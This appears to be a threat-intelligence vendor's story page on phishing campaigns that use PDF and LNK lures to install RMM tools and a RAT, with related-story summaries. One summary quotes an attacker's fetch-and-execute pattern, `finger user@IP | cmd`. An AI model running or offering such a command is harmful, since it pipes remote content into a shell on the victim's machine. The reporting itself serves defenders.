Weaponized Document Lures Used to Deliver Malware and Remote Access
Multiple reports describe threat actors using document-themed lures to deliver malicious payloads while evading user scrutiny and defensive controls. ASEC-reported activity shows weaponized PDF files distributed via phishing (e.g., “Invoice,” “Payment”) that display a decoy image or a “Failed to load PDF document” error to push victims to click through to fake Google Drive/Adobe pages, ultimately installing legitimate RMM tools (e.g., Syncro, SuperOps, NinjaOne, ConnectWise ScreenConnect) signed with a valid certificate to blend in as administrative software rather than obvious malware.
Separately, research on APT36 / Transparent Tribe details a targeted espionage operation against Indian government, academic, and strategic entities using spear-phishing ZIP attachments containing oversized LNK files masquerading as PDFs; execution chains leverage mshta.exe to retrieve remote HTA content, decrypt and reconstruct payloads in memory, and deploy a RAT (tracked as ReadWriteRAT) with capabilities including encrypted C2, remote command execution, screenshot capture, clipboard access, and data theft. Other items in the set cover unrelated threats—WordPress SEO cloaking that selectively serves malicious content to verified Googlebot IP ranges, a vendor blog overview of Medusa ransomware activity, and reporting on CrazyHunter ransomware impacting Taiwan healthcare—indicating the commonality here is document/SEO deception techniques, not a single unified incident.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
3 events from the most recent confirmed update back to the earliest known activity.
Researchers detail PDF-to-RMM attack chain and tooling
Researchers reported technical details of the ongoing PDF lure campaign, including fake error or non-preview PDF tricks, delivery of signed RMM installers via Advanced Installer or NSIS, and at least one NSIS variant that downloaded additional payloads from attacker-controlled infrastructure. The report highlighted abuse of trusted RMM software such as Syncro to gain unauthorized remote access while evading typical malware detections.
Transparent Tribe targets Indian entities with multi-stage LNK malware
APT36, also known as Transparent Tribe, conducted a targeted spear-phishing campaign against Indian government, academic, and strategic organizations using ZIP archives containing malicious LNK files disguised as exam-related PDFs. The infection chain used mshta.exe to fetch a remote HTA loader and ultimately deployed an in-memory RAT tracked by PolySwarm as ReadWriteRAT.
RMM lure campaign begins using weaponized PDFs
ASEC assessed that a phishing campaign using deceptive PDF files to trick users into installing legitimate remote monitoring and management tools has been active since at least October 2025, based on code-signing certificate observations. The lures used invoice-, order-, and payment-themed filenames and redirected victims to fake Google Drive or Adobe-themed pages.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
2 references tracked. Mallory keeps watching after this page renders.
See the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
Mar 21, 2026
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
Mar 21, 2026
Spearphishing Campaigns Abuse PDF and Windows Screensaver Files to Install Legitimate RMM Tools
Threat actors have been observed using spearphishing lures and *non-traditional* attachment types—particularly Windows screensaver (`.scr`) executables—to trick users into running code that silently installs legitimate **remote monitoring and management (RMM)** agents (e.g., **SimpleHelp**). ReliaQuest research described business-themed filenames (e.g., `InvoiceDetails.scr`, `ProjectSummary.scr`) delivered via links hosted on legitimate cloud services (e.g., GoFile), with the `.scr` format helping bypass controls that don’t treat screensavers as executables. Once installed, the RMM tooling provides interactive remote access that can enable data theft, lateral movement, and follow-on payload deployment, including ransomware, while blending into normal IT administration traffic. Separately, researchers also reported a spam operation using **fake PDF attachments** that display an error message and redirect victims to a lookalike *Adobe Acrobat* download flow, but instead installs trusted, digitally signed RMM software to establish persistent access. A different phishing campaign used a multi-stage **PDF chain** hosted on reputable infrastructure (e.g., **Vercel Blob**) to redirect victims to a credential-harvesting page and exfiltrate stolen data via a **Telegram bot**, emphasizing how attackers are increasingly abusing high-reputation cloud platforms and document-based lures to evade email and web filtering (including scenarios where the initial email contains no malicious link and can pass SPF/DKIM/DMARC checks).
Mar 21, 2026